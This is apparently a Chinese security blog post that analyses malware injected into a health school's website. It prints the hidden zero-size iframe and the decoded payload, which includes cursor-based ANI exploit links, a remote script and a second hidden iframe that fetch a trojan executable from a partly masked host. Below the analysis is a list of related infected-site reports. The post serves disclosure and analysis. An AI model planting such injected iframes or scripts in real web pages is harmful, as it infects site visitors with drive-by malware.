某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码

简介: 某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码

植入的代码为:

/---
<iframe src=hxxp://www.1**8d*m***m.com/d***m*/kehu0739.htm width=0 height=0>
---/

kehu0739.htm的内容所用代码为US-ASCII。

到  http://purpleendurer.ys168.com 下载 US-ASCII加密、解密程序 解密后得到的内容包含代码:

/---
<DIV id=new_content_jp style="DISPLAY: none">
<DIV style="CURSOR: url('hxxp://www.1**8d*m***m.com/wangma/39a.jpg')">
<DIV style="CURSOR: url('hxxp://www.1**8d*m***m.com/wangma/39b.jpg')"></DIV></DIV></DIV>
<SCRIPT language=javascript src="hxxp://www.1**8d*m***m.com/wangma/39.js"></SCRIPT>
<iframe src=hxxp://www.1**8d*m***m.com/wangma/061439.htm width=0 height=0></iframe>
---/

hxxp://www.1**8d*m***m.com/wangma/39a.jpg(Kaspersky 报为 Exploit.Win32.ImG-ANI.ac)和 39b.jpg 利用 ANI漏洞 下载Hxxp://1**8d*m***m.com/xi*a***/kehu0739.exe


相关文章
|
2月前
|
安全
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
|
2月前
|
监控 安全 数据安全/隐私保护
一个会下载至少3个Viking等恶意程序的网站
一个会下载至少3个Viking等恶意程序的网站
|
2月前
|
JavaScript 前端开发
发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
|
2月前
|
安全 JavaScript 前端开发
某交通违法查询网页被挂马Virus.Win32.AutoRun.xu等
某交通违法查询网页被挂马Virus.Win32.AutoRun.xu等
|
2月前
|
Web App开发 安全
某县农业信息网挂马 Worm.Win32.AutoRun.umf
某县农业信息网挂马 Worm.Win32.AutoRun.umf
|
2月前
|
安全
某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等
某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等
|
2月前
|
开发框架 安全 .NET
X天科技有限公司网站挂马Trojan.DL.Win32.Mnless/Win32.Losabel
X天科技有限公司网站挂马Trojan.DL.Win32.Mnless/Win32.Losabel
|
2月前
|
安全 数据安全/隐私保护
某论坛挂马Worm.Win32.Autorun.eyh
某论坛挂马Worm.Win32.Autorun.eyh
|
2月前
|
安全 JavaScript 前端开发
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
|
2月前
|
安全 JavaScript 前端开发
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu